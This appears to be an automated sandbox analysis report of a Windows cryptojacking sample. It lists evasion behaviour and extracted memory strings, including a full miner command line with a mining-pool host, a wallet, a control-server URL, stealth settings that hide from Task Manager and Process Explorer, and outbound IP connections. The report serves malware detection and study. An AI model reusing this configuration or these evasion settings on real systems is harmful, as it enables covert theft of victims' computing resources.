                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\explorer.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_13-18688)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_13-18688)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Check user administrative privileges: IsUserAndAdmin, DecisionNode (graph_13-18791)
                    Source: C:\Windows\explorer.exe | System information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API/Special instruction interceptor: Address: 7FFE2220E814
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506136526.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506026824.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
                    Source: explorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHPYEERYSYJBFOQMOFC
                    Source: explorer.exe, 0000001C.00000003.2506136526.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506026824.000000000141B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXEEXE
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE>Q
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="ASRJSKWDSDOC.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --NICEHASH --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="YEERYSYJBFOQMOFC"
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXES\TEMP9,F
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:3333--USER=46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB--PASS=--CPU-MAX-THREADS-HINT=90--CINIT-WINRING=ASRJSKWDSDOC.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--NICEHASH--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=YEERYSYJBFOQMOFCB
                    Source: explorer.exe, 0000001C.00000003.2505054410.0000000001434000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2506090498.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.000000000142C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2059032550.0000000001430000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2061842707.000000000143A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2046419071.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2504693994.0000000001430000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031CA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,13_2_0031CA00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 855
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6192
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3583
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3836
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5862
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1038
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 958
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7363
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2227
                    Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_16-18695)
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys
                    Source: C:\Windows\explorer.exe | Evaded block: after key decision (graph_16-18185)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_13-17858)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API coverage: 6.9 %
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | API coverage: 9.6 %
                    Source: C:\Users\user\Desktop\file.exe TID: 3716 | Thread sleep count: 855 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740 | Thread sleep count: 6192 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740 | Thread sleep count: 3583 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 | Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264 | Thread sleep count: 3836 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 | Thread sleep count: 5862 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 | Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\timeout.exe TID: 7396 | Thread sleep count: 83 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 | Thread sleep count: 1038 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 | Thread sleep count: 958 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7888 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7876 | Thread sleep count: 57 > 30
                    Source: C:\Windows\explorer.exe TID: 7876 | Thread sleep time: -57000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 | Thread sleep count: 7363 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 | Thread sleep count: 2227 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 8064 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\explorer.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031CA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,13_2_0031CA90
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00313620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,13_2_00313620
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E097F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,16_2_00E097F0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,18_2_022C7FB0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022DBBF0 GetSystemInfo,18_2_022DBBF0
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\295B.tmp
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.tmp
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp
                    Source: explorer.exe, 00000010.00000003.2642056847.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: file.exe, 00000000.00000002.1947547762.00000000005EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                    Source: explorer.exe, 0000001C.00000002.2933340637.0000000001389000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
                    Source: explorer.exe, 00000010.00000003.2015726294.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933740665.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2557868865.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2038161328.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642056847.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015592624.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933414236.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2617916671.0000000000940000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000010.00000003.2015726294.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2933740665.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2557868865.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2038161328.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2642056847.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015592624.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW#k
                    Source: powershell.exe, 00000007.00000002.1827349550.000002386CF5F000.00000004.00000020.00020000.00000000.sdmp, downloaded_file.exe, 0000000D.00000002.1957167452.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2019228490.0000000000940000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW3X
                    Source: explorer.exe, 0000001C.00000002.2933340637.00000000013E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWd
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17866)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-18807)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17860)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17887)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-18795)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17857)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-18800)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17880)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17883)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17891)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-20358)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17934)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17894)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | API call chain: ExitProcess graph end node (graph_13-17899)
                    Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node (graph_16-18697)
                    Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00327111 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00327111
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00305720 GetCurrentProcess,IsWow64Process,GetProcessHeap,13_2_00305720
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0032A950 SetUnhandledExceptionFilter,13_2_0032A950
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00327FFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00327FFF
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E2C4B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00E2C4B0
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E2E488 SetUnhandledExceptionFilter,16_2_00E2E488
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E30D64 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00E30D64
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E2A6E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00E2A6E8
                    Source: C:\Windows\explorer.exe | Code function: 18_2_02382A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_02382A80
                    Source: C:\Windows\explorer.exe | Code function: 18_2_02385890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_02385890
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 19_2_00007FF66CCC1190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,19_2_00007FF66CCC1190
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 19_2_00007FF66CF844B0 SetUnhandledExceptionFilter,19_2_00007FF66CF844B0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\explorer.exe File created: WindosCPUsystem.exe.16.dr
                    Source: C:\Windows\explorer.exe Network Connect: 5.188.137.200 3333
                    Source: C:\Windows\explorer.exe Network Connect: 154.216.20.243 443
                    Source: C:\Windows\explorer.exe Network Connect: 37.203.243.102 3333
                    Source: C:\Windows\explorer.exe Network Connect: 185.157.162.216 5200
